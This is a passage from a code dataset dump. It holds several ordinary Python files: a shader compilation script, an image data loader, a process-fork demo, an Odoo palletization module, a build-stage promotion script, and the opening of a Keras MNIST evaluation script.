-i common\\ --platform windows -p vs_3_0 -O 3\"\n\nglcmd_fs = \"shadercRelease -f {} -o {} --type f -i common\\ --platform linux -p 120\"\nglcmd_vs = \"shadercRelease -f {} -o {} --type v -i common\\ --platform linux -p 120\"\n\ncmds_vs = [(dx11cmd_vs, \"dx11\"), (dx9cmd_vs, \"dx9\"), (glcmd_vs, \"glsl\")]\ncmds_fs = [(dx11cmd_fs, \"dx11\"), (dx9cmd_fs, \"dx9\"), (glcmd_fs, \"glsl\")]\n\ndef processFile(prefix, dirname, filename):\n print(\"Processing {}, {}, {}\".format(prefix, dirname, filename))\n\n cmds = []\n if prefix == \"vs\":\n cmds = cmds_vs\n elif prefix == \"fs\":\n cmds = cmds_fs\n else:\n print(\"Unknown prefix {}\".format(prefix))\n\n infile = join(dirname, filename)\n\n for (cmd, desttype) in cmds:\n outfile = join(\"..\", desttype, filename[0:-3] + \".bin\")\n fullcmd = cmd.format(infile, outfile)\n print(fullcmd)\n os.system(fullcmd)\n\ndef listdirs(dirname):\n allthings = [join(dirname, f) for f in os.listdir(dirname)]\n return [ f for f in allthings if not isfile(f) ]\n\ndef listfiles(dirname):\n allthings = os.listdir(dirname)\n return [ f for f in allthings if isfile(join(dirname, f)) ]\n\ndef main():\n dirs = listdirs(\".\")\n for dirname in dirs:\n files = listfiles(dirname)\n print(files)\n for filename in files:\n prefix = filename[0:2]\n suffix = filename[-3:]\n if suffix == \".sc\" and (prefix == \"vs\" or prefix == \"fs\"):\n processFile(prefix, dirname, filename)\n\nif __name__ == '__main__':\n main()\n","sub_path":"satellites/shaders/raw/compile_shaders.py","file_name":"compile_shaders.py","file_ext":"py","file_size_in_byte":2015,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"34016987","text":"\"\"\"Class that is responsible for the loading and preprocessing of data.\n\"\"\"\nfrom sklearn.model_selection import train_test_split\n\nfrom src.base.base_data_loader import BaseDataLoader\nfrom src.dataloaders.data_generator import DataGen\nfrom src.utils import factory\n\n\nclass DataLoader(BaseDataLoader):\n def __init__(self, train_imgs_dir, train_masks_dir, test_imgs_dir, test_masks_dir,\n imgs_ext, masks_ext, masks_suffix, config):\n \"\"\" \n Args:\n train_imgs_dir (Path):\n train_masks_dir (Path):\n test_imgs_dir (Path):\n test_masks_dir (Path):\n imgs_ext (str): e.g. jpg\n masks_ext (str): e.g. png\n masks_suffix (str):\n\n config.data_loader requires:\n img_shape ((height, width, channels)): \n batch_size (int):\n \"\"\"\n super(DataLoader, self).__init__(config)\n\n self.train_imgs_dir = train_imgs_dir\n self.train_masks_dir = train_masks_dir\n self.test_imgs_dir = test_imgs_dir\n self.test_masks_dir = test_masks_dir\n self.imgs_ext = imgs_ext\n self.masks_ext = masks_ext\n self.masks_suffix = masks_suffix\n\n # Get train images file names\n # Get .jps only\n train_img_paths = list(train_imgs_dir.glob(\"*.jpg\"))\n # train_img_paths = list(train_imgs_dir.iterdir())\n train_img_names = [p.stem for p in train_img_paths]\n\n # Train/Val split\n self.train_ids, self.val_ids = train_test_split(\n train_img_names,\n test_size=0.2,\n random_state=42\n )\n\n # Get test images file names\n # test_img_paths = list(test_imgs_dir.iterdir())\n # self.test_ids = [p.stem for p in test_img_paths]\n\n # Init default data generator\n\n def get_train_datagen(self):\n img_shape = self.config.data_loader.img_shape\n batch_size = self.config.data_loader.batch_size\n aug_name = self.config.data_loader.aug\n # Import augmentation function wrapper\n if aug_name:\n # aug = factory.create(f'src.dataloaders.preprocess.{aug_name}')\n aug = True\n else:\n aug = None\n backbone = self.config.model.backbone\n\n return DataGen(\n self.train_ids,\n self.train_imgs_dir,\n self.train_masks_dir,\n self.imgs_ext,\n self.masks_ext,\n self.masks_suffix,\n backbone,\n batch_size=batch_size,\n img_shape=img_shape,\n shuffle=True,\n aug=aug\n )\n\n def get_val_datagen(self):\n img_shape = self.config.data_loader.img_shape\n batch_size = self.config.data_loader.batch_size\n backbone = self.config.model.backbone\n\n return DataGen(\n self.val_ids,\n self.train_imgs_dir,\n self.train_masks_dir,\n self.imgs_ext,\n self.masks_ext,\n self.masks_suffix,\n backbone,\n batch_size=batch_size,\n img_shape=img_shape,\n shuffle=False,\n aug=None\n )\n\n def get_test_datagen(self):\n img_shape = self.config.data_loader.img_shape\n batch_size = self.config.data_loader.batch_size\n backbone = self.config.model.backbone\n\n return DataGen(\n self.test_ids,\n self.test_imgs_dir,\n self.test_masks_dir,\n self.imgs_ext,\n self.masks_ext,\n self.masks_suffix,\n backbone,\n batch_size=batch_size,\n img_shape=img_shape,\n shuffle=False,\n aug=None\n )\n\n def create_test_datagen(self):\n pass\n\n def get_test_ids(self):\n return self.test_ids\n","sub_path":"src/dataloaders/data_loader.py","file_name":"data_loader.py","file_ext":"py","file_size_in_byte":3795,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"301500403","text":"import os \nfrom time import sleep \n\npid = os.fork()\n\nif pid < 0:\n print(\"Error\")\nelif pid == 0:\n sleep(3)\n print(\"Child %d process exit\"%os.getpid())\n os._exit(2)\nelse:\n # pid,status = os.wait()\n # 非阻塞模式\n pid,status = os.waitpid(-1,os.WNOHANG)\n print(\"pid:\",pid)\n # 获取子进程退出\n print(\"status:\",os.WEXITSTATUS(status))\n while True:\n sleep(100)","sub_path":"Pythonnet/codeandnote/day5/wait.py","file_name":"wait.py","file_ext":"py","file_size_in_byte":403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"128955366","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import models, fields, api\n\nclass HubiPalletization(models.Model):\n _name = 'hubi.palletization'\n _description = \"Palletization\"\n _order = 'name'\n \n def _get_qty(self):\n return (self.uom_qty or 0) - (self.pallet_qty or 0)\n \n def _get_default_company_id(self):\n #return self._context.get('force_company', self.env.user.company_id.id)\n return self.env['sale.order'].search([('id', '=', self.order_id.id)]).company_id.id\n \n \n name = fields.Char(string='Name', required=True)\n company_id = fields.Many2one('res.company', string='Company', default=_get_default_company_id, required=True)\n order_id = fields.Many2one('sale.order', string='Order Reference', required=True)\n product_id = fields.Many2one('product.product', string='Product', required=True)\n default_pallet_qty = fields.Float(string='Default Quantity on the Pallet')\n uom_qty = fields.Float(string='Order Quantity')\n pallet_qty = fields.Float(string='Quantity on the Pallet')\n residual_qty = fields.Float(string='Residual Quantity', compute='_residual_qty')\n input_pallet_id = fields.Many2one('hubi.palletization.line', string='Complete No Pallet')\n #input_pallet_id = fields.Many2one('hubi.palletization.line', string='Complete No Pallet', domain=\"[('order_id', '=', order_id)]\")\n \n input_qty = fields.Float(string='Complete Quantity', default=_get_qty)\n \n \n #@api.onchange('default_pallet_qty')\n #def onchange_order_id(self):\n # res = {}\n # if self.order_id:\n # order_number = self._context.get('active_id')\n # res['domain'] = {'input_pallet_id': [('order_id', '=', order_number)]}\n # return res\n\n #@api.one\n def _default_qty(self):\n self.default_pallet_qty = self.product_id.default_pallet_qty\n \n #@api.one\n def _residual_qty(self):\n #qty_p = self.pallet_qty or 0\n #qty_o = self.uom_qty or 0\n #pallet_line=self.env['hubi.palletization'].search([('order_line_id','=', self.id)])\n #for line in pallet_line:\n # if line.quantity :\n # qty_p = line.quantity\n \n self.residual_qty = (self.uom_qty or 0) - (self.pallet_qty or 0)\n\n def new_pallet(self):\n self.env.cr.commit() \n \n #company_code = self.env['sale.order'].search([('id', '=', self.id)]).company_id.id or self._context.get('company_id') or self.env['res.users']._get_company().id\n company_code = self.env['sale.order'].search([('id', '=', self.order_id.id)]).company_id.id\n id_order = self.order_id.id\n \n max_qty = self.default_pallet_qty\n if self.residual_qty != 0 and max_qty > 0:\n # Find the last pallet\n no_pallet = 0\n query_args = {'id_order' : id_order, 'company_code' : company_code}\n query = \"\"\"SELECT pallet_no FROM hubi_palletization_line \n WHERE order_id=%(id_order)s and company_id=%(company_code)s \n order by pallet_no desc LIMIT 1\"\"\"\n\n self.env.cr.execute(query, query_args)\n ids = [(r[0]) for r in self.env.cr.fetchall()]\n \n for last_no in ids:\n no_pallet=last_no \n \n reste = self.residual_qty\n qty_a_pl= self.residual_qty\n new_qty_pallet = self.pallet_qty + self.residual_qty\n \n palletization_line_ids = self.env['hubi.palletization.line'].search([('palletization_id', '=', self.id), ('company_id', '=', company_code)])\n if (not palletization_line_ids) or (qty_a_pl != 0):\n qty = 0\n \n if max_qty > 0:\n while qty_a_pl !=0:\n if qty_a_pl >= max_qty:\n qty = max_qty\n reste = qty_a_pl - max_qty\n else:\n qty = qty_a_pl\n reste = 0\n \n qty_a_pl = reste\n no_pallet += 1\n \n # Create palletization line\n # 'company_id': self._context.get('force_company', self.env.user.company_id.id),\n name_line = ('Order : %s / Pallet : %s') % (self.order_id.id,no_pallet)\n pallet_line_vals = {\n 'name': name_line,\n 'company_id': company_code,\n 'palletization_id':self.id,\n 'order_id': self.order_id.id,\n 'product_id': self.product_id.id,\n 'quantity': qty,\n 'pallet_no': no_pallet,\n \n }\n palletization_line = self.env['hubi.palletization.line'].create(pallet_line_vals) \n \n # Update pallet_qty on hubi_palletization\n self._cr.execute(\"UPDATE hubi_palletization set pallet_qty = %s, input_qty = %s WHERE id=%s \", (new_qty_pallet, reste, self.id))\n self.env.cr.commit()\n \n def complete_pallet(self):\n self.env.cr.commit() \n \n #company_code = self.env['sale.order'].search([('id', '=', self.id)]).company_id.id or self._context.get('company_id') or self.env['res.users']._get_company().id\n company_code = self.env['sale.order'].search([('id', '=', self.order_id.id)]).company_id.id\n id_order = self.order_id.id\n \n max_qty = self.default_pallet_qty\n no_pallet = self.input_pallet_id.pallet_no\n no_product = self.product_id.id\n \n if self.input_qty != 0 and self.input_pallet_id != 0 and self.residual_qty != 0 and max_qty > 0:\n if self.input_qty > self.residual_qty:\n qty_a_pl = self.residual_qty\n else: \n qty_a_pl = self.input_qty \n \n new_qty_pallet = self.pallet_qty + qty_a_pl \n reste = self.residual_qty - qty_a_pl\n \n # Update pallet_qty on hubi_palletization\n self._cr.execute(\"UPDATE hubi_palletization set pallet_qty = %s, input_qty = %s, input_pallet_id= null WHERE id=%s \", (new_qty_pallet, reste, self.id))\n \n \n # Find the line in hubi_palletization_line for this pallet_id and this product_id\n palletization_line_ids = self.env['hubi.palletization.line'].search([('palletization_id', '=', self.id), ('pallet_no', '=', no_pallet), ('product_id', '=', no_product), ('company_id', '=', company_code) ])\n if (not palletization_line_ids):\n # Create palletization line\n name_line = ('Order : %s / Pallet : %s') % (self.order_id.id, no_pallet)\n pallet_line_vals = {\n 'name': name_line,\n 'company_id': company_code,\n 'palletization_id':self.id,\n 'order_id': self.order_id.id,\n 'product_id': no_product,\n 'quantity': qty_a_pl,\n 'pallet_no': no_pallet,\n }\n palletization_line = self.env['hubi.palletization.line'].create(pallet_line_vals) \n else:\n # Update quantity on hubi_palletization_line\n new_qty = palletization_line_ids.quantity + qty_a_pl \n self._cr.execute(\"UPDATE hubi_palletization_line set quantity = %s WHERE palletization_id=%s and pallet_no=%s and product_id=%s and company_id=%s \", \n (new_qty, self.id, no_pallet, no_product, company_code))\n\n self.env.cr.commit() \n\n \n \n #@api.model\n #def get(self, name, model, res_id=False):\n # domain = self._get_domain(name, model)\n # if domain is not None:\n # domain = [('res_id', '=', res_id)] + domain\n # order_number = self._context.get('active_id')\n # res['domain'] = {'input_pallet_id': [('order_id', '=', order_number)]}\n #make the search with company_id asc to make sure that properties specific to a company are given first\n #prop = self.search(domain, limit=1, order='company_id')\n #if prop:\n # return prop.get_by_record()\n # return False\n\n #def _get_domain(self, prop_name, model):\n #self._cr.execute(\"SELECT id FROM ir_model_fields WHERE name=%s AND model=%s\", (prop_name, model))\n #res = self._cr.fetchone()\n #if not res:\n # return None\n #company_id = self._context.get('force_company') or self.env['res.company']._company_default_get(model, res[0]).id\n #return [('fields_id', '=', res[0]), ('company_id', 'in', [company_id, False])]\n #res = {}\n #if self.order_id:\n # order_number = self._context.get('active_id')\n # res['domain'] = {'input_pallet_id': [('order_id', '=', order_number)]}\n #return res\n \n \nclass HubiPalletizationLine(models.Model):\n _name = \"hubi.palletization.line\"\n _description = \"Palletization Line\"\n _order = 'name'\n \n def _get_default_company_id(self):\n #return self.env['sale.order'].search([('id', '=', self.id)]).company_id.id or self._context.get('force_company', self.env.user.company_id.id)\n return self.env['sale.order'].search([('id', '=', self.order_id.id)]).company_id.id\n \n name = fields.Char(string='Name', required=True)\n company_id = fields.Many2one('res.company', string='Company', default=_get_default_company_id, required=True)\n palletization_id = fields.Many2one('hubi.palletization', string='Palletization Reference', required=True)\n #order_id = fields.Char(string='sale.order')\n order_id = fields.Many2one('sale.order', string='Order Reference', required=True)\n pallet_no = fields.Integer(string='Pallet Number')\n product_id = fields.Many2one('product.product', string='Product', required=True)\n quantity = fields.Float(string='Quantity on the Pallet')\n\n def delete_pallet(self):\n self.env.cr.commit() \n\n # delete in hubi.palletization.line\n #company_code = self.env['sale.order'].search([('id', '=', self.id)]).company_id.id or self._context.get('company_id') or self.env['res.users']._get_company().id\n company_code = self.env['sale.order'].search([('id', '=', self.order_id.id)]).company_id.id\n id_order = self.order_id.id\n\n qty = self.quantity\n palletization_id = self.palletization_id.id\n no_pallet_supp = self.pallet_no\n order_id = self.order_id.id\n no_product = self.product_id.id\n \n self._cr.execute(\"DELETE FROM hubi_palletization_line WHERE id=%s \", (self.id,))\n \n # update in hubi.palletization : pallet_qty\n palletization_ids = self.env['hubi.palletization'].search([('id', '=', palletization_id)])\n if (palletization_ids) :\n qty_p =(palletization_ids.pallet_qty or 0) - qty\n qty_r =(palletization_ids.uom_qty or 0) - (qty_p or 0)\n #palletization_ids.write({\"pallet_qty\":[(4, qty_p)]})\n palletization_ids.write({'pallet_qty': qty_p})\n palletization_ids.write({'input_qty': qty_r})\n \n \n #new_no_pallet = no_pallet_supp\n \n no_pallet_exist = False\n pallets = self.env['hubi.palletization.line'].search([('order_id', '=', order_id), ('company_id', '=', company_code), ('pallet_no', '=', no_pallet_supp)] , order='pallet_no asc')\n for pallet in pallets:\n no_pallet_exist = True\n \n if (not no_pallet_exist):\n # rename No pallet : \n pallets = self.env['hubi.palletization.line'].search([('order_id', '=', order_id), ('company_id', '=', company_code), ('pallet_no', '>=', no_pallet_supp)] , order='pallet_no asc')\n for pallet in pallets:\n new_no_pallet = pallet.pallet_no\n if (pallet.pallet_no == 1):\n new_no_pallet = 1\n else: \n new_no_pallet = new_no_pallet - 1\n name_line = ('Order : %s / Pallet : %s') % (order_id, new_no_pallet)\n pallet.write({'name': name_line, 'pallet_no': new_no_pallet})\n \n #new_no_pallet += 1\n \n self.env.cr.commit()\n \n \nclass HubiProductPalletization(models.Model):\n _inherit = \"product.template\"\n\n pallet_description = fields.Char(string='Pallet Description') \n default_pallet_qty = fields.Float(string='Default Quantity on the Pallet')\n\nclass HubiSaleOrderPalletization(models.Model):\n _inherit = \"sale.order\"\n\n palletization_ids = fields.One2many('hubi.palletization', 'order_id', string='Palletization Lines', copy=True, auto_join=True)\n palletization_line_ids = fields.One2many('hubi.palletization.line', 'order_id', string='Palletization Pallets')\n\n def create_pallet(self):\n self.env.cr.commit()\n # Find the last pallet\n #company_code = self.env['sale.order'].search([('id', '=', self.id)]).company_id.id or self._context.get('company_id') or self.env['res.users']._get_company().id\n company_code = self.env['sale.order'].search([('id', '=', self.id)]).company_id.id\n id_order = self.id\n\n no_pallet = 0\n query_args = {'id_order' : id_order, 'company_code' : company_code}\n query = \"\"\"SELECT pallet_no FROM hubi_palletization_line \n WHERE order_id=%(id_order)s and company_id=%(company_code)s \n order by pallet_no desc LIMIT 1\"\"\"\n\n self.env.cr.execute(query, query_args)\n ids = [(r[0]) for r in self.env.cr.fetchall()]\n \n for last_no in ids:\n no_pallet=last_no \n \n # Update pallet_qty on hubi_palletization\n\n # Find the sale.order.line\n query=\"\"\"SELECT order_id, product_id,\n coalesce(product_template.default_pallet_qty,0) AS default_pallet_qty,\n sum(product_uom_qty) AS uom_qty \n FROM sale_order_line \n inner join product_product on product_id = product_product.id\n inner join product_template on product_template.id = product_product.product_tmpl_id\n where order_id = %(id_order)s and sale_order_line.company_id=%(company_code)s \n group by order_id, product_id,\n product_template.default_pallet_qty\n order by order_id, product_id\"\"\" \n\n self.env.cr.execute(query, query_args)\n ids = [(r[0],r[1],r[2],r[3]) for r in self.env.cr.fetchall()]\n \n for order_id, prod_id, max_qty, uom_qty in ids:\n if max_qty >0:\n palletization_ids = self.env['hubi.palletization'].search([('order_id', '=', order_id), ('product_id', '=', prod_id), ('company_id', '=', company_code)])\n if not palletization_ids:\n # Create palletization \n name_line = ('Order : %s ') % (order_id)\n pallet_vals = {\n 'name': name_line,\n 'company_id': company_code,\n 'order_id': order_id,\n 'product_id': prod_id,\n 'uom_qty': uom_qty,\n 'default_pallet_qty': max_qty,\n 'pallet_qty': 0,\n }\n palletization = self.env['hubi.palletization'].create(pallet_vals) \n else:\n query_maj = \"\"\"UPDATE hubi_palletization set uom_qty = %s, default_pallet_qty = %s \n WHERE order_id=%s AND product_id=%s and company_id=%s \"\"\"\n self._cr.execute(query_maj, (uom_qty, max_qty, order_id, prod_id, company_code))\n self.env.cr.commit()\n \n \n # Create palletization line \n query=\"\"\"SELECT id, order_id, product_id,\n coalesce(default_pallet_qty,0) AS default_pallet_qty,\n coalesce(uom_qty,0) AS uom_qty,\n coalesce(pallet_qty,0) AS pallet_qty \n FROM hubi_palletization\n where order_id = %(id_order)s and company_id=%(company_code)s \n order by order_id, product_id\"\"\" \n\n self.env.cr.execute(query, query_args)\n ids = [(r[0],r[1],r[2],r[3],r[4],r[5]) for r in self.env.cr.fetchall()]\n \n for palletization_id, order_id, prod_id, max_qty, uom_qty, pallet_qty in ids:\n reste = uom_qty - pallet_qty\n qty_a_pl= uom_qty - pallet_qty\n \n palletization_line_ids = self.env['hubi.palletization.line'].search([('palletization_id', '=', palletization_id), ('company_id', '=', company_code)])\n if (not palletization_line_ids) or (qty_a_pl != 0):\n qty = 0\n \n if max_qty > 0:\n while qty_a_pl !=0:\n if qty_a_pl >= max_qty:\n qty = max_qty\n reste = qty_a_pl - max_qty\n else:\n qty = qty_a_pl\n reste = 0\n \n qty_a_pl = reste\n no_pallet += 1\n \n # Create palletization line\n name_line = ('Order : %s / Pallet : %s') % (order_id, no_pallet)\n pallet_line_vals = {\n 'name': name_line,\n 'company_id': company_code,\n 'palletization_id': palletization_id,\n 'order_id': order_id,\n 'product_id': prod_id,\n 'quantity': qty,\n 'pallet_no': no_pallet,\n \n }\n palletization_line = self.env['hubi.palletization.line'].create(pallet_line_vals) \n \n # Update pallet_qty on hubi_palletization\n self._cr.execute(\"UPDATE hubi_palletization set pallet_qty = %s, input_qty = %s WHERE id=%s \", (uom_qty, reste, palletization_id))\n self.env.cr.commit()\n \n \n \n #@api.multi\n def action_palletization(self):\n self.env.cr.commit()\n self.create_pallet() \n \n self.ensure_one()\n view_id = self.env[\"ir.model.data\"].get_object_reference(\"hubi\", \"hubi_palletization_form\")\n \n action = self.env.ref('hubi.action_hubi_palletization').read()[0]\n ##action['views'] = [(self.env.ref('hubi.hubi_palletization_form').id, 'form')]\n action['views'] = [(view_id[1], 'form')]\n action['res_id'] = self.id\n action['res_model'] = \"sale.order\"\n \n return action\n \n #return {\"type\":\"ir.actions.act_window\",\n # \"view_mode\":\"form\",\n # \"view_type\":\"form\",\n # \"views\":[(view_id[1], \"form\")],\n # \"res_id\": 'sale.order' and self.id,\n # \"res_model\":\"sale.order\" \n # }\n \n ","sub_path":"hubi/models/palletization.py","file_name":"palletization.py","file_ext":"py","file_size_in_byte":19457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"219918512","text":"# TODO: On a general project note, the system needs a way to know when it is not possible to promote a directory ( when it is 'busy' )\n# TODO: On a very general project note, all 'raise' statements should be changed to 'sys.exit' calls with disting error codes so callers\n# TODO: On another note, make every single exit code from all scripts unique and document them in a central location\n# can automatically rectify any failures\n# promotes build stage 'source' to build stage 'destination' by performing the following steps:\n# - renaming stage 'destination' to '.destination.delete_marked'\n# - renaming stage 'source' to 'destination'\n# - copying the '.description' file in '.destination.delete_marked' to 'destination'\n# - in the event of error, 'destination' is renamed to 'source', and '.destination.delete_marked' is renamed to 'destination'\n# note, all .*.delete_marked files are cleaned up by a later job\nimport os\nimport os.path\nimport shutil\nimport sys\n\nfrom utils.stage_info import read_stage_info\nfrom utils import app_logger\n\n# exit codes\nEXIT_OK = 0\nEXIT_NO_BOOT_SCRIPT_LAUNCH = 1\nEXIT_INVALID_STAGE_NAME_PROVIDED = 2\nEXIT_SOURCE_STAGE_DOES_NOT_EXIST = 3\nEXIT_RENAMING_DESTINATION_STAGE_TO_DELETE_STAGE_FAILED = 4\nEXIT_RENAMING_SOURCE_STAGE_TO_DESTINATION_STAGE_FAILED = 5\nEXIT_RENAMING_SOURCE_STAGE_TO_DESTINATION_STAGE_ROLLBACK_FAILED = 6\nEXIT_COPYING_DESCRIPTION_FILE_FROM_DELETE_STAGE_TO_DESTINATION_STAGE_FAILED = 7\nEXIT_COPYING_DESCRIPTION_FILE_FROM_DELETE_STAGE_TO_DESTINATION_STAGE_ROLLBACK_FAILED = 8\n\n# environment variables\nENV_SOURCE_STAGE = 'BUILDER_PROMOTE_BUILD_STAGE_SOURCE_STAGE'\nENV_DESTINATION_STAGE = 'BUILDER_PROMOTE_BUILD_STAGE_DESTINATION_STAGE'\n\nENV_LAUNCHED_IN_BOOT_SCRIPT = 'BUILDER_PROMOTE_BUILD_STAGE_LAUNCHED_IN_BOOT_SCRIPT'\n\nLOGGER = None\n\nSTAGE_DESCRIPTION_FILE_NAME = '.description'\n\n# copy the description file from the delete marked stage to 'destination_stage'. Exit with specific exit code on failure.\n# 'source_stage' is used only in the rollback procedure and is the original 'source_stage' passed to script\ndef copy_description_file_from_delete_marked_stage_to_destination_stage( source_stage, destination_stage ):\n LOGGER.info( \"Copying description file located in stage folder '{}' to '{}'\".format( destination_stage.DeletionFolderName, destination_stage.Folder ) )\n\n destination_stage_hidden_description_file = os.path.join( destination_stage.DeletionFolderName, STAGE_DESCRIPTION_FILE_NAME )\n destination_stage_description_file = os.path.join( destination_stage.Folder, STAGE_DESCRIPTION_FILE_NAME )\n\n try:\n shutil.copy( destination_stage_hidden_description_file, destination_stage_description_file )\n except Exception as error:\n LOGGER.error( \"Copying description file failed because '{}'. Attempting rollback.\".format( error ) )\n\n if not copy_description_file_from_delete_marked_stage_to_destination_stage_rollback ( source_stage, destination_stage ):\n LOGGER.error( \"Rollback procedure failed.\" )\n sys.exit( EXIT_COPYING_DESCRIPTION_FILE_FROM_DELETE_STAGE_TO_DESTINATION_STAGE_ROLLBACK_FAILED )\n\n sys.exit( EXIT_COPYING_DESCRIPTION_FILE_FROM_DELETE_STAGE_TO_DESTINATION_STAGE_FAILED )\n\n\n# move 'to_stage' to 'from_stage'; move hidden to stage to 'to_stage'\ndef copy_description_file_from_to_delete_stage_to_destination_stage_rollback( source_stage, destination_stage ):\n LOGGER.warn( \"Renaming destination build stage folder '{}' to source build stage folder '{}'\".format( destination_stage.Folder, source_stage.Folder ) )\n\n try:\n shutil.move( destination_stage.Folder, source_stage.Folder )\n except Exception as error:\n LOGER.error( \"Rename attempt failed.\" )\n return False\n\n return move_source_stage_to_destination_stage_rollback( destination_stage )\n\n\n# given a stage name, get the corresponding stage object. Exit with specific error code if stage name is invalid\ndef get_stage_object( stage_name ):\n stages = read_stage_info.load_stage_info()\n for stage in stages:\n if stage_name == stage.Name:\n return stage\n\n # since we are here, the stage name did not match a valid stage name\n LOGGER.error( \"Provided stage name '{}' is invalid. Exiting with error.\".format( stage_name ) )\n sys.exit( EXIT_INVALID_STAGE_NAME_PROVIDED )\n\n\n# move stage 'source_stage' to 'destination_stage'. Exit with specific exit code on failure\ndef move_source_stage_to_destination_stage( source_stage, destination_stage ):\n LOGGER.info( \"Renaming source build stage folder '{}' to destination build stage folder '{}'\".format( source_stage.Folder, destination_stage.Folder ) )\n\n try:\n shutil.move( source_stage.Folder, destination_stage.Folder )\n except Exception as error:\n LOGGER.error( \"Rename failed because '{}'. Attempting rollback.\".format( error ) )\n\n if not move_source_stage_to_destination_stage_rollback( destination_stage ):\n LOGGER.error ( \"Rollback procedure failed.\" )\n sys.exit( EXIT_RENAMING_SOURCE_STAGE_TO_DESTINATION_STAGE_ROLLBACK_FAILED )\n\n sys.exit( EXIT_RENAMING_SOURCE_STAGE_TO_DESTINATION_STAGE_FAILED )\n\n\n# mark destination stage 'destination_stage' for deletion. Exit with specific exit code on failure\ndef mark_destination_stage_for_deletion( destination_stage ):\n LOGGER.info( \"Marking build stage folder '{}' for deletion by renaming to '{}'.\".format( destination_stage.Folder, destination_stage.DeletionFolderName ) )\n\n try:\n shutil.move( destination_stage.Folder, destination_stage.DeletionFolderName )\n except Exception as error:\n LOGGER.error( \"Renaming failed because '{}'.\".format( error ) )\n sys.exit( EXIT_RENAMING_DESTINATION_STAGE_TO_DELETE_STAGE_FAILED )\n\n\n# remove the deletion suffix from stage 'destination_stage'. Returns True/False on succcess/failure\ndef move_source_stage_to_destination_stage_rollback( destination_stage ):\n LOGGER.warn( \"Renaming destination stage folder '{}' to original name '{}'\".format( destination_stage.DeletionFolderName, destination_stage.Folder ) )\n\n try:\n shutil.move( destination_stage.DeletionFolderName, destination_stage.Folder )\n except Exception as error:\n LOGGER.error( \"Rename attempt failed.\" )\n return False\n\n return True\n\n\ndef main():\n # don't run unless we were launched via boot script\n if not ENV_LAUNCHED_IN_BOOT_SCRIPT in os.environ:\n LOGGER.critical( \"promote_build_stage not launched via run script. Exiting.\" )\n sys.exit( EXIT_NO_BOOT_SCRIPT_LAUNCH )\n\n LOGGER.info( \"Beginning promote_build_stage run.\" )\n\n source_stage_name = os.environ[ ENV_SOURCE_STAGE ]\n source_stage = get_stage_object( source_stage_name )\n\n destination_stage_name = os.environ[ ENV_DESTINATION_STAGE ]\n destination_stage = get_stage_object( destination_stage_name )\n\n # do nothing if source and destination stages are the same\n if source_stage_name == destination_stage_name:\n LOGGER.info( \"Promoting stage '{}' to itself is a no-op.\".format( source_stage_name ) )\n sys.exit( EXIT_OK )\n\n # ensure the source stage exists\n if not os.path.isdir( source_stage.Folder ):\n LOGGER.error( \"Source stage '{}' does not exist at path '{}'. Fatal error\".format( source_stage_name, source_stage.Folder ) )\n sys.exit( EXIT_SOURCE_STAGE_DOES_NOT_EXIST )\n\n LOGGER.info( \"Promoting stage '{}' to '{}'\".format( source_stage_name, destination_stage_name ) )\n\n # mark the destination stage as ready for deletion\n mark_destination_stage_for_deletion( destination_stage )\n\n # move the source stage to the destination stage\n move_source_stage_to_destination_stage( source_stage, destination_stage )\n\n # copy the description file in the deletion marked destination stage to the destination stage\n copy_description_file_from_delete_marked_stage_to_destination_stage( source_stage, destination_stage )\n\n LOGGER.info( \"Successfully promoted stages.\" )\n\n\nif __name__ == '__main__':\n LOGGER = app_logger.Logger.getLogger()\n main()\n","sub_path":"src/promote_build_stage/promote_build_stage.py","file_name":"promote_build_stage.py","file_ext":"py","file_size_in_byte":8497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"299344645","text":"################################################################################\r\n# CS 156a Bonus Exercise\r\n# Author: Aadyot Bhatnagar\r\n# Last modified: October 27, 2018\r\n# Description: A script to load and evaluate a saved Keras model's performance\r\n# on the MNIST dataset of handwritten images. Prints out training\r\n# and validation loss and accuracy, and also visualizes validation\r\n# images the model got wrong.\r\n################################################################################\r\n\r\nimport os\r\nimport argparse\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport tensorflow as tf\r\nimport keras\r\nfrom keras.models import model_from_json\r\nfrom keras.datasets import mnist\r\n\r\n## Parse command line arguments\r\ndef parse_args():\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument('-m', '--model-name',\r\n help='prefix for saved trained model we want to evaluate ' +\r\n '(e.g. dense_arch1, conv_regularize05, etc.)',\r\n required=True)\r\n return parser.parse_args()\r\n\r\n## Get data in a format compatible with the neural net we want to evaluate\r\ndef get_data(model):\r\n # Import the MNIST dataset using Keras\r\n (X_train, y_train), (X_test, y_test) = mnist.load_data()\r\n\r\n # Determine input shape that the model given should take\r\n input_shape = model.get_layer(index=0).input_shape\r\n\r\n # Normalize data to be in [0, 1] and reshape appropriately\r\n X_train = X_train.reshape(-1, *input_shape[1:]) / 255\r\n X_test = X_test.reshape(-1, *input_shape[1:]) / 255\r\n\r\n # Convert labels to one-hot vectors (probability distributions w/\r\n # probability 1 assigned to the correct label)\r\n y_train = keras.utils.to_categorical(y_train)\r\n y_test = keras.utils.to_categorical(y_test)\r\n\r\n return (X_train, y_train), (X_test, y_test)\r\n\r\n\r\ndef main():\r\n args = parse_args()\r\n model_name = args.model_name\r\n\r\n # Remove src from cwd if necessary\r\n cwd = os.getcwd()\r\n if os.path.basename(cwd) == 'src': cwd = os.path.dirname(cwd)\r\n\r\n # Create img directory to save images if needed\r\n os.makedirs(os.path.join(cwd, 'img'), exist_ok=True)\r\n\r\n # Create model directory to save models if needed\r\n os.makedirs(os.path.join(cwd, 'model'), exist_ok=True)\r\n model_weights_fname = os.path.join(cwd, 'model', args.model_name + '.h5')\r\n model_json_fname = os.path.join(cwd, 'model', args.model_name + '.json')\r\n\r\n # Load model and its weights\r\n with open(model_json_fname, 'r') as f: model_json = f.read()\r\n model = model_from_json(model_json)\r\n model.load_weights(model_weights_fname)\r\n\r\n # Get MNIST data shaped appropriately for the model\r\n (X_train, y_train), (X_test, y_test) = get_data(model)\r\n\r\n # Compile model and evaluate its performance on training and test data\r\n 